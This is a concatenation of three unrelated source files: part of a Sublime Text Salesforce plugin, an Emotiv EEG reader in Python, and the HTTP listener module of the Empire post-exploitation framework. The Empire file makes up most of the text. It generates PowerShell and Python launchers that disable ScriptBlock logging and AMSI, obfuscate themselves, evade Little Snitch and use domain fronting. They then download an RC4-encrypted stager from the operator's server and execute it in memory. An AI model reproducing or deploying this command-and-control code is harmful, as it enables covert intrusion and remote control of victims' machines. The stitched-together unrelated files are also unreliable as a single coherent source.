if "subscribed_metadata_objects" not in settings["default_project"] or \
not settings["default_project"]["subscribed_metadata_objects"]:
return self.window.run_command("toggle_metadata_objects", {
"callback_options": {
"callback_command": "create_new_project"
}
})
dpn = settings["default_project"]["project_name"]
message = "Are you sure you really want to create new project for %s?" % dpn
if not sublime.ok_cancel_dialog(message, "Create New Project?"): return
util.add_project_to_workspace(settings)
processor.handle_new_project()
class DescribeMetadata(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DescribeMetadata, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
processor.handle_describe_metadata(callback_options)
class ExtractToHere(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExtractToHere, self).__init__(*args, **kwargs)
def run(self, files):
extract_to, name = os.path.split(self._file)
name, extension = name.split(".")
extract_to = os.path.join(extract_to, name)
try:
util.extract_zipfile(self._file, extract_to)
except BaseException as ex:
return Printer.get("error").write(ex)
Printer.get("log").write_start().write("Extracted to " + extract_to)
def is_visible(self, files):
if not files or len(files) > 1:
return False
self._file = files[0]
return zipfile.is_zipfile(self._file)
class UpdateStaticResource(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateStaticResource, self).__init__(*args, **kwargs)
def run(self, dirs):
base64_package = util.compress_resource_folder(self.resource_dir)
processor.handle_deploy_thread(base64_package)
def is_visible(self, dirs):
if not dirs or len(dirs) > 1: return False
self.resource_dir = dirs[0]
static_resource_folder, resource_name = os.path.split(self.resource_dir)
if not static_resource_folder.endswith("staticresources"):
return False
return True
class RefreshFileFromServer(sublime_plugin.TextCommand):
def run(self, view):
self.view.window().run_command("refresh_files_from_server", {
"files": [self.view.file_name()]
})
def is_enabled(self):
file_name = self.view.file_name()
if not file_name: return False
attr = util.get_component_attribute(file_name)[0]
if not attr or "url" not in attr:
return False
return True
def is_visible(self):
return self.is_enabled()
class RefreshFilesFromServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RefreshFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
message = "Are you sure you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Refresh Files?"): return
for file_name in files:
if file_name.endswith("-meta.xml"): continue # Ignore -meta.xml file
attr = util.get_component_attribute(file_name)[0]
# Handle Refresh Current Component
if attr["type"] == "StaticResource":
processor.handle_refresh_static_resource(attr, file_name)
else:
processor.handle_refresh_file_from_server(attr, file_name)
def is_visible(self, files):
if len(files) == 0: return False
self._files = [f for f in files if not f.endswith("-meta.xml")]
if len(self._files) == 0: return False
for _file in self._files:
attr = util.get_component_attribute(_file)[0]
if not attr or "url" not in attr:
return False
return True
|
EmotivDeviceReader.py
|
# encoding: utf-8
'''
Created on Dec 18, 2018
@author: Yongrui Huang
'''
import time
from array import *
from ctypes import *
from sys import exit
from multiprocessing import Process
from multiprocessing import Queue
import numpy as np
class EmotivDeviceReader(object):
'''
classdocs
This class is used to read EEG data from emotiv
Attributes:
queue: the queue save EEG data
'''
def __init__(self):
'''
Constructor
'''
self.queue = Queue(maxsize=-1)
# num_EDR = 0 # 记录创建了多少个EmotivDeviceReader
self.num_start = 0 # 记录start了多少个线程
def test(self):
print("real_time_detection.GUI.EmotivDeviceReader.py now test.")
print("test test test test test")
# check_status(self)
def check_status(self):
print("EmotivDeviceReader.py.check_status(self).start...")
'''
check if the device is connect correctly, if not, exit this process
'''
if self.libEDK.IEE_EngineConnect(create_string_buffer(b"Emotiv Systems-5")) != 0:
print("Failed to start up Emotiv Engine.")
exit()
else:
print("Successfully start up Emotiv Engine.")
print("EmotivDeviceReader.py.check_status(self).end...")
# check_status(self)
# loop(self)
def loop(self):
print("EmotivDeviceReader.py..loop(self).start...")
'''
the loop is used to continuously read data from device
'''
try:
self.libEDK = cdll.LoadLibrary("win64/edk.dll")
except Exception as e:
print('Error: cannot load EDK lib:', e)
exit()
print("EmotivDeviceReader.py...successfully connect")
self.IEE_EmoEngineEventCreate = self.libEDK.IEE_EmoEngineEventCreate
self.IEE_EmoEngineEventCreate.restype = c_void_p
self.eEvent = self.IEE_EmoEngineEventCreate()
# print("self.eEvent = self.IEE_EmoEngineEventCreate()")
self.IEE_EmoEngineEventGetEmoState = self.libEDK.IEE_EmoEngineEventGetEmoState
self.IEE_EmoEngineEventGetEmoState.argtypes = [c_void_p, c_void_p]
self.IEE_EmoEngineEventGetEmoState.restype = c_int
# print("self.IEE_EmoEngineEventGetEmoState.restype = c_int")
self.IEE_EmoStateCreate = self.libEDK.IEE_EmoStateCreate
self.IEE_EmoStateCreate.restype = c_void_p
self.eState = self.IEE_EmoStateCreate()
# print("self.eState = self.IEE_EmoStateCreate()")
self.IEE_EngineGetNextEvent = self.libEDK.IEE_EngineGetNextEvent
self.IEE_EngineGetNextEvent.restype = c_int
self.IEE_EngineGetNextEvent.argtypes = [c_void_p]
# print("self.IEE_EngineGetNextEvent.argtypes = [c_void_p]")
self.IEE_EmoEngineEventGetUserId = self.libEDK.IEE_EmoEngineEventGetUserId
self.IEE_EmoEngineEventGetUserId.restype = c_int
self.IEE_EmoEngineEventGetUserId.argtypes = [c_void_p , c_void_p]
# print("self.IEE_EmoEngineEventGetUserId.argtypes = [c_void_p , c_void_p]")
self.IEE_EmoEngineEventGetType = self.libEDK.IEE_EmoEngineEventGetType
self.IEE_EmoEngineEventGetType.restype = c_int
self.IEE_EmoEngineEventGetType.argtypes = [c_void_p]
# print("self.IEE_EmoEngineEventGetType.argtypes = [c_void_p]")
self.IEE_EmoEngineEventCreate = self.libEDK.IEE_EmoEngineEventCreate
self.IEE_EmoEngineEventCreate.restype = c_void_p
# print("self.IEE_EmoEngineEventCreate.restype = c_void_p")
self.IEE_EmoEngineEventGetEmoState = self.libEDK.IEE_EmoEngineEventGetEmoState
self.IEE_EmoEngineEventGetEmoState.argtypes = [c_void_p, c_void_p]
self.IEE_EmoEngineEventGetEmoState.restype = c_int
# print("self.IEE_EmoEngineEventGetEmoState.restype = c_int")
self.IEE_EmoStateCreate = self.libEDK.IEE_EmoStateCreate
self.IEE_EmoStateCreate.argtype = c_void_p
self.IEE_EmoStateCreate.restype = c_void_p
# print("self.IEE_EmoStateCreate.restype = c_void_p")
self.IEE_FFTSetWindowingType = self.libEDK.IEE_FFTSetWindowingType
self.IEE_FFTSetWindowingType.restype = c_int
self.IEE_FFTSetWindowingType.argtypes = [c_uint, c_void_p]
# print("self.IEE_FFTSetWindowingType.argtypes = [c_uint, c_void_p]")
self.IEE_GetAverageBandPowers = self.libEDK.IEE_GetAverageBandPowers
self.IEE_GetAverageBandPowers.restype = c_int
self.IEE_GetAverageBandPowers.argtypes = [c_uint, c_int, c_void_p, c_void_p, c_void_p, c_void_p, c_void_p]
# print("self.IEE_GetAverageBandPowers.argtypes = [c_uint, c_int, c_void_p, c_void_p, c_void_p, c_void_p, c_void_p]")
self.IEE_EngineDisconnect = self.libEDK.IEE_EngineDisconnect
self.IEE_EngineDisconnect.restype = c_int
self.IEE_EngineDisconnect.argtype = c_void_p
# print("self.IEE_EngineDisconnect.argtype = c_void_p")
self.IEE_EmoStateFree = self.libEDK.IEE_EmoStateFree
self.IEE_EmoStateFree.restype = c_int
self.IEE_EmoStateFree.argtypes = [c_void_p]
# print("self.IEE_EmoStateFree.argtypes = [c_void_p]")
self.IEE_EmoEngineEventFree = self.libEDK.IEE_EmoEngineEventFree
self.IEE_EmoEngineEventFree.restype = c_int
self.IEE_EmoEngineEventFree.argtypes = [c_void_p]
# print("self.IEE_EmoEngineEventFree.argtypes = [c_void_p]")
self.check_status()
print("EmotivDeviceReader.py...self.check_status()...")
userID = c_uint(0)
user = pointer(userID)
ready = 0
state = c_int(0)
alphaValue = c_double(0)
low_betaValue = c_double(0)
high_betaValue = c_double(0)
gammaValue = c_double(0)
thetaValue = c_double(0)
alpha = pointer(alphaValue)
low_beta = pointer(low_betaValue)
high_beta = pointer(high_betaValue)
gamma = pointer(gammaValue)
theta = pointer(thetaValue)
channelList = array('I', [3, 7, 9, 12, 16]) # IED_AF3, IED_AF4, IED_T7, IED_T8, IED_Pz
loop_times = 0 # count how many times did while(1) run
# while(1)
while(1):
loop_times += 1
state = self.IEE_EngineGetNextEvent(self.eEvent)
data = []
if state == 0:
eventType = self.IEE_EmoEngineEventGetType(self.eEvent)
self.IEE_EmoEngineEventGetUserId(self.eEvent, user)
if eventType == 16: # libEDK.IEE_Event_enum.IEE_UserAdded
ready = 1
self.IEE_FFTSetWindowingType(userID, 1); # 1: libEDK.IEE_WindowingTypes_enum.IEE_HAMMING
print("User added")
if ready == 1:
for i in channelList:
result = c_int(0)
result = self.IEE_GetAverageBandPowers(userID, i, theta, alpha, low_beta, high_beta, gamma)
if result == 0: # EDK_OK
print("theta: %.6f, alpha: %.6f, low beta: %.6f, high beta: %.6f, gamma: %.6f \n" %
(thetaValue.value, alphaValue.value, low_betaValue.value,
high_betaValue.value, gammaValue.value))
one_read_data = [thetaValue.value, alphaValue.value,
low_betaValue.value, high_betaValue.value, gammaValue.value]
if len(one_read_data) > 0:
data += one_read_data
elif state != 0x0600:
print("Internal error in Emotiv Engine ! ")
if len(data) > 0:
self.queue.put(np.array(data))
# --------------- #
# sleep_time = 0.5
# print("sleep(%f)" % sleep_time)
# print("loop_times(%d)" % loop_times)
# time.sleep(sleep_time)
# if loop_times >= 50:
# break
# while(1)
print("EmotivDeviceReader.py..loop(self).end...")
return 0
# loop(self)
def start(self):
'''
start a sub-process
'''
print("sub_process")
self.num_start += 1
print("num_start: %d " % self.num_start)
sub_process = Process(target=self.loop) # self.loop is the loop(self) function above
print("sub_process.start().start")
sub_process.start()
print("sub_process.start().end")
#error when run __main__ in the tool.py
'''
line 204, in start
sub_process.start()
'''
def get_data(self):
'''
read psd data
Returns:
theta, alpha, low_beta, high_beta, gamma in order
IED_AF3, IED_AF4, IED_T7, IED_T8, IED_Pz in order
'''
print("EmotivDeviceReader.get_data().start...")
data_list = []
while self.queue.qsize() > 0:
ele = self.queue.get()
data_list.append(ele)
print("data_list[0]")
print(data_list[0])
print("data_list[1]")
print(data_list[1])
# print(data_list[2])
print("EmotivDeviceReader.get_data().end...")
return data_list
# __main__
if __name__ == '__main__':
print("EmotivDeviceReader.py..__main__.start...")
device_reader = EmotivDeviceReader()
print("device_reader.start()")
device_reader.start()
print("device_reader.start()")
time.sleep(5)
print("for 5 loop: data")
for i in range(5):
print("i:%d" % i)
data = device_reader.get_data()
data = np.array(data)
print(data)
time.sleep(1)
print("EmotivDeviceReader.py..__main__.end...")
# __main__
|
http.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
page = "<html><body><h1>It works!</h1>"
page += "<p>This is the default web page for this server.</p>"
page += "<p>The web server software is running but no content has been added, yet.</p>"
page += "</body></html>"
return page
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
# read in the stager base
f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
if host.endswith("/"):
host = host[0:-1]
if workingHours != "":
stager = stager.replace('SET_WORKINGHOURS', workingHours)
if killDate != "":
stager = stager.replace('SET_KILLDATE', killDate)
# # patch the server and key information
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", stage1)
stager = stager.replace("index.php", stage2)
# # base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
